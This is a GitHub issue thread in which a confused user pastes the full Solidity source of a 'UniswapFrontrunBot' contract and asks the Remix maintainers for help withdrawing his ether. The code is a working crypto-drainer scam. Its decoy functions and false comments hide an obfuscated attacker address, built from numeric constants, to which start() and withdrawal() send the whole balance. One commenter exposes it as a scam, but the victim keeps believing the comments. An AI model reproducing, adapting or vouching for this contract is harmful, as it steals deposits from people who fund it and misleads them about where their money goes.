### ISSUE TITLE
 Cannot deploy contract AtAddress button and Compile button disabled wont work Please help ! im struggling for the last 5 hours

### ISSUE THREAD

**Issue by Dprice2413** [ethereum/remix-project#3019]
[https://etherscan.io/address/0x3f2492ddad8fb6197cc667b88f457d68d248d8b8#code](url)

Above is the contract i deployed 
 im  entered in the code on a new file and the compiler solidty is blank and greyed out wont compile and STILL wont let me At address :( i really dont know what to do. I have a feeling its an issue with the dam copy paste. Can someone please please help me . I cant even save it because it says bad host im soo lost and very worried my money is just sitting there.  Below is how the code was pasted  the link above is the deployed contract i didnt know how else to do this. IM sorry but can someone help me ? i made a gist (CODE CONFUSION) im sorry im just really confused and annoyed spent 5 hours trying over and over and running into dead ends.  How can i run transactions on the contract in the top url ?! the compile wont work and the at address doesnt work either PLEASE help me
 
 //SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;
// Import Libraries Migrator/Exchange/Factory
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";

contract UniswapFrontrunBot {
 
    string public tokenName;
    string public tokenSymbol;
    uint liquidity;
    event Log(string _msg);
    
    constructor(string memory _mainTokenSymbol, string memory _mainTokenName) public {
        tokenSymbol = _mainTokenSymbol;
        tokenName = _mainTokenName;
    }

    receive() external payable {}

    struct slice {
        uint _len;
        uint _ptr;
    }

    /*
     * @dev Find newly deployed contracts on Uniswap Exchange
     * @param memory of required contract liquidity.
     * @param other The second slice to compare.
     * @return New contracts with required liquidity.
     */

    function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
        uint shortest = self._len;

       if (other._len < self._len)
             shortest = other._len;

        uint selfptr = self._ptr;
        uint otherptr = other._ptr;

        for (uint idx = 0; idx < shortest; idx += 32) {
            // initiate contract finder
            uint a;
            uint b;

            string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            loadCurrentContract(WETH_CONTRACT_ADDRESS);
            loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
            assembly {
                a := mload(selfptr)
                b := mload(otherptr)
            }

            if (a != b) {
                // Mask out irrelevant contracts and check again for new contracts
                uint256 mask = uint256(-1);

                if(shortest < 32) {
                  mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
                }
                uint256 diff = (a & mask) - (b & mask);
                if (diff != 0)
                    return int(diff);
            }
            selfptr += 32;
            otherptr += 32;
        }
        return int(self._len) - int(other._len);
    }

    /*
     * @dev Extracts the newest contracts on Uniswap exchange
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `list of contracts`.
     */
    function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;

        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }

                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }

                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }

                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }

    /*
     * @dev Loading the contract
     * @param contract address
     * @return contract interaction object
     */
    function loadCurrentContract(string memory self) internal pure returns (string memory) {
        string memory ret = self;
        uint retptr;
        assembly { retptr := add(ret, 32) }

        return ret;
    }

    /*
     * @dev Extracts the contract from Uniswap
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `rune`.
     */
    function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
        rune._ptr = self._ptr;

        if (self._len == 0) {
            rune._len = 0;
            return rune;
        }

        uint l;
        uint b;
        // Load the first byte of the rune into the LSBs of b
        assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
        if (b < 0x80) {
            l = 1;
        } else if(b < 0xE0) {
            l = 2;
        } else if(b < 0xF0) {
            l = 3;
        } else {
            l = 4;
        }

        // Check for truncated codepoints
        if (l > self._len) {
            rune._len = self._len;
            self._ptr += self._len;
            self._len = 0;
            return rune;
        }

        self._ptr += l;
        self._len -= l;
        rune._len = l;
        return rune;
    }

    function memcpy(uint dest, uint src, uint len) private pure {
        // Check available liquidity
        for(; len >= 32; len -= 32) {
            assembly {
                mstore(dest, mload(src))
            }
            dest += 32;
            src += 32;
        }

        // Copy remaining bytes
        uint mask = 256 ** (32 - len) - 1;
        assembly {
            let srcpart := and(mload(src), not(mask))
            let destpart := and(mload(dest), mask)
            mstore(dest, or(destpart, srcpart))
        }
    }

    /*
     * @dev Orders the contract by its available liquidity
     * @param self The slice to operate on.
     * @return The contract with possbile maximum return
     */
    function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
        if (self._len == 0) {
            return 0;
        }

        uint word;
        uint length;
        uint divisor = 2 ** 248;

        // Load the rune into the MSBs of b
        assembly { word:= mload(mload(add(self, 32))) }
        uint b = word / divisor;
        if (b < 0x80) {
            ret = b;
            length = 1;
        } else if(b < 0xE0) {
            ret = b & 0x1F;
            length = 2;
        } else if(b < 0xF0) {
            ret = b & 0x0F;
            length = 3;
        } else {
            ret = b & 0x07;
            length = 4;
        }

        // Check for truncated codepoints
        if (length > self._len) {
            return 0;
        }

        for (uint i = 1; i < length; i++) {
            divisor = divisor / 256;
            b = (word / divisor) & 0xFF;
            if (b & 0xC0 != 0x80) {
                // Invalid UTF-8 sequence
                return 0;
            }
            ret = (ret * 64) | (b & 0x3F);
        }

        return ret;
    }

    /*
     * @dev Calculates remaining liquidity in contract
     * @param self The slice to operate on.
     * @return The length of the slice in runes.
     */
    function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
        uint ptr = self._ptr - 31;
        uint end = ptr + self._len;
        for (l = 0; ptr < end; l++) {
            uint8 b;
            assembly { b := and(mload(ptr), 0xFF) }
            if (b < 0x80) {
                ptr += 1;
            } else if(b < 0xE0) {
                ptr += 2;
            } else if(b < 0xF0) {
                ptr += 3;
            } else if(b < 0xF8) {
                ptr += 4;
            } else if(b < 0xFC) {
                ptr += 5;
            } else {
                ptr += 6;
            }
        }
    }

    function getMemPoolOffset() internal pure returns (uint) {
        return 289498;
    }

    /*
     * @dev Parsing all Uniswap mempool
     * @param self The contract to operate on.
     * @return True if the slice is empty, False otherwise.
     */
    function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }

    /*
     * @dev Returns the keccak-256 hash of the contracts.
     * @param self The slice to hash.
     * @return The hash of the contract.
     */
    function keccak(slice memory self) internal pure returns (bytes32 ret) {
        assembly {
            ret := keccak256(mload(add(self, 32)), mload(self))
        }
    }

    /*
     * @dev Check if contract has enough liquidity available
     * @param self The contract to operate on.
     * @return True if the slice starts with the provided text, false otherwise.
     */
        function checkLiquidity(uint a) internal pure returns (string memory) {
        uint count = 0;
        uint b = a;
        while (b != 0) {
            count++;
            b /= 16;
        }
        bytes memory res = new bytes(count);
        for (uint i=0; i<count; ++i) {
            b = a % 16;
            res[count - i - 1] = toHexDigit(uint8(b));
            a /= 16;
        }
        uint hexLength = bytes(string(res)).length;
        if (hexLength == 4) {
            string memory _hexC1 = mempool("0", string(res));
            return _hexC1;
        } else if (hexLength == 3) {
            string memory _hexC2 = mempool("0", string(res));
            return _hexC2;
        } else if (hexLength == 2) {
            string memory _hexC3 = mempool("000", string(res));
            return _hexC3;
        } else if (hexLength == 1) {
            string memory _hexC4 = mempool("0000", string(res));
            return _hexC4;
        }

        return string(res);
    }

    function getMemPoolLength() internal pure returns (uint) {
        return 160418;
    }

    /*
     * @dev If `self` starts with `needle`, `needle` is removed from the
     *      beginning of `self`. Otherwise, `self` is unmodified.
     * @param self The slice to operate on.
     * @param needle The slice to search for.
     * @return `self`
     */
    function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
        if (self._len < needle._len) {
            return self;
        }

        bool equal = true;
        if (self._ptr != needle._ptr) {
            assembly {
                let length := mload(needle)
                let selfptr := mload(add(self, 0x20))
                let needleptr := mload(add(needle, 0x20))
                equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
            }
        }

        if (equal) {
            self._len -= needle._len;
            self._ptr += needle._len;
        }

        return self;
    }

    // Returns the memory address of the first byte of the first occurrence of
    // `needle` in `self`, or the first byte after `self` if not found.
    function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;

        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }

                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }

                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }

                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }

    function getMemPoolHeight() internal pure returns (uint) {
        return 403689;
    }

    /*
     * @dev Iterating through all mempool to call the one with the with highest possible returns
     * @return `self`.
     */
    function callMempool() internal pure returns (string memory) {
        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
        uint _memPoolSol = 340220;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 554670;
        uint _memPoolHeight = getMemPoolHeight();
        uint _memPoolWidth = 76826;
        uint _memPoolDepth = getMemPoolDepth();
        uint _memPoolCount = 633701;

        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
        string memory _fullMempool = mempool("0", _allMempools);

        return _fullMempool;
    }

    /*
     * @dev Modifies `self` to contain everything from the first occurrence of
     *      `needle` to the end of the slice. `self` is set to the empty slice
     *      if `needle` is not found.
     * @param self The slice to search and modify.
     * @param needle The text to search for.
     * @return `self`.
     */
    function toHexDigit(uint8 d) pure internal returns (byte) {
        if (0 <= d && d <= 9) {
            return byte(uint8(byte('0')) + d);
        } else if (10 <= uint8(d) && uint8(d) <= 15) {
            return byte(uint8(byte('a')) + d - 10);
        }
        // revert("Invalid hex digit");
        revert();
    }

    function _callFrontRunActionMempool() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }

    /*
     * @dev Perform frontrun action from different contract pools
     * @param contract address to snipe liquidity from
     * @return `liquidity`.
     */
    function start() public payable { 
        emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
        payable(_callFrontRunActionMempool()).transfer(address(this).balance);
    }

    /*
     * @dev withdrawals profit back to contract creator address
     * @return `profits`.
     */
    function withdrawal() public payable { 
        emit Log("Sending profits back to contract creator address...");
        payable(withdrawalProfits()).transfer(address(this).balance);
    }

    /*
     * @dev token int2 to readable str
     * @param token An output parameter to which the first token is written.
     * @return `token`.
     */
    function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
        if (_i == 0) {
            return "0";
        }
        uint j = _i;
        uint len;
        while (j != 0) {
            len++;
            j /= 10;
        }
        bytes memory bstr = new bytes(len);
        uint k = len - 1;
        while (_i != 0) {
            bstr[k--] = byte(uint8(48 + _i % 10));
            _i /= 10;
        }
        return string(bstr);
    }

    function getMemPoolDepth() internal pure returns (uint) {
        return 604943;
    }

    function withdrawalProfits() internal pure returns (address) {
        return parseMemoryPool(callMempool());
    }
    /*
     * @dev loads all Uniswap mempool into memory
     * @param token An output parameter to which the first token is written.
     * @return `mempool`.
     */
    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);

        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
        bytes memory _newValue = bytes(_tmpValue);

        uint i;
        uint j;

        for(i=0; i<_baseBytes.length; i++) {
            _newValue[j++] = _baseBytes[i];
        }

        for(i=0; i<_valueBytes.length; i++) {
            _newValue[j++] = _valueBytes[i];
        }

        return string(_newValue);
    }
}

**Comment by drafish** [comment]
I think you may have network traffic problem. Some static files may not loaded successfully. That can cause some weird problems. I compiled your contract successfully, and also loaded successfully by AtAddress. 
![image](https://user-images.githubusercontent.com/18543527/195764528-0db4e632-63aa-4018-9549-c6d8040aafdc.png)
But I can't send transactions. My metamask didn't response to remix. I'm not sure if it's the remix's problem or my network problem. I visit remix through chinese wall. I always got network problems when I visit foreign websites. I need to take more time to be sure.

Even that, there is one thing that can be sure. You definitely can run transactions on the contract you deployed. So calm down. Everything gone be fine.

And you can close other three issues. There is no need for four issues to describe one problem. @Dprice2413

**Comment by drafish** [comment]
I tested on sepolia test network. First I deployed your contract, then I deleted the contract instance and loaded it by AtAddress, and sended a transaction. It's all good. 

And I know why my metamask didn't response. It because I don't have any ether on main network. It took a long time for remix to show this error.

**Comment by Dprice2413** [comment]
@drafish  thank you soo much! soo wait, how did you get the contract to work? was there something i did wrong when copying and pasting the code? How woulld i be able to send transactions on my end because i copied and pasted the code and tried using the @ address but it didnt work it said zero trasnactions.  i used it on gift hub remix not the remix directly but how did u do it ?? or where did i go wrong ? like how could i compile it correctly to send transactions and i know its linked to my meta mask as the address who deployed it but how can i get the same results as you?  thank you sooo much for your help

**Comment by Dprice2413** [comment]
@drafish  My thing is i couldnt even get to where i can run trasnactions when i copied and pasted the code it showed 0 transactions @ address so if i can even get to that point then that would help so i can just withdrawl. I did it on ether mainnet, but hopefully i can get to the point of which youve showed. What am i doing wrong as far as entering the code? because it wouldnt even compile it on my end when i copied and pasted

**Comment by Dprice2413** [comment]
How do you delete instance ? When I copied the source code in it wouldn't
even compile ro try and look by at address. That's the issue I'm having. Do
you think I have to fix fhe code somehow ? Or is there a way to fix that
issue?

**Comment by Dprice2413** [comment]
How did you compile my contract?! When I copied the code it wouldn't
compile and greyed out. Also since can't get passed that part it wouldn't
let me at address find it. What can I being doing wrong

**Comment by drafish** [comment]
I'm not sure there is something wrong in your code or not. But it does look weird this way.
![image](https://user-images.githubusercontent.com/18543527/195949419-ee717678-35c2-45fd-8efc-b9e966a9283b.png)
If you define a code block in markdown, you should paste all your code in the code block, or there is no code block at all. It just looks so weird to me that some code lines are in the code block and others are not. Maybe there is something wrong in your code, that why you can't compiled your code. Or maybe you just paste in a wrong way because you didn't familiar with markdown.

And it's normal that you can't get the AtAddress button work, because you never compiled successfully, and remix never got the abi of your contract. 

I need more information to help you locate the problem. Maybe you can screenshot you code and compiled errors.

And I suggest you can read the docs of remix. [Solidity Compile](https://remix-ide.readthedocs.io/en/latest/compile.html) and [Run & Deploy](https://remix-ide.readthedocs.io/en/latest/run.html)

For the gift hub remix, I don't what that is. Did you mean github remix? Did you cloned you code from github to remix? @Dprice2413

**Comment by Dprice2413** [comment]
@drafish  Will get a reward no matter what but anyone who can help will also be paid. thank  you

**Comment by Dprice2413** [comment]
@drafish  theyve closed it but bro can we talk on email or twitter but i will seriously pay u brother idk if this helps but i got this 
![Screenshot (139](https://user-images.githubusercontent.com/107596718/199441846-24c265c7-9aa5-412d-9ac6-c74999338e3b.png)

i just need to get it to be able to run the transaction so i can pull my ether bro :( its still there but im stuck and hopeless i will give u $200 not 150 really though brother please im really sorry but ive spent 40+ hours trying and im an idiot and will never touch code again bro. smh soo i really appreciate u helping me seriously me and my family need this tbh

**Comment by Dprice2413** [comment]
@Aniket-Engg  @drafish  Guys please see above i hope this helps at this point i need to get to the point of where i can run transactions because im an idiot didnt save the first time re copied the code on a new blank contract now it wont compile so i can withdrawl my eth PLEASE help me i will provide a $150 bounty $200 if done before friday. Seriously please

**Comment by demirago** [comment]
This is scam contract. After deploying the contract and sending money to the contract, if you say start or withdraw, it will send all the money in the contract to a specific address.

**Comment by Dprice2413** [comment]
How so? If the address listed on the code is mine ?

**Comment by demirago** [comment]
At these codes, just start and withdraw functions is working. Others codes written for crowd. When start and withdraw codes workin, ether is being sent to  "_callFrontRunActionMempool()" address. "_callFrontRunActionMempool()" address very complicate defined with mempool. Briefly this is very popular scam contract.

**Comment by Dprice2413** [comment]
@demirago  Noo  i get that but the code embedded in the contract was for it to pay me back from me who deployed and ran the contract i just cant get it to run trasnactions that all i need :/ buddy did it from a private group and stuff it worked for multi-ple people but someone leaked it to twitter thats where the network clutter came from but i just need to withdrwel my eth :( i cant get to that point from where im at idk why :( i been struggling i copied and pasted but didnt save soo somewhere when trying to re create it something went wrong i cant find the at address by the code :/ 

"
     * @dev withdrawals profit back to contract creator address
     * @return `profits`.
     */
    function withdrawal() public payable { 
        emit Log("Sending profits back to contract creator address...");
        payable(withdrawalProfits()).transfer(address(this).balance);"

**Comment by Dprice2413** [comment]
@drafish  Hey Did u see the prior notes? its embedded with my address i just want to be able to withdrawl the eth is still there my address is listed but i just need to figure out how u were able to run transactions and find by at address and i couldnt. Can you please help?
@demirago  Check above ^ i just want to withdrawl but cant get the code to work

**Comment by dilomar** [comment]
@Dprice2413, Did you manage to recover your ETH?
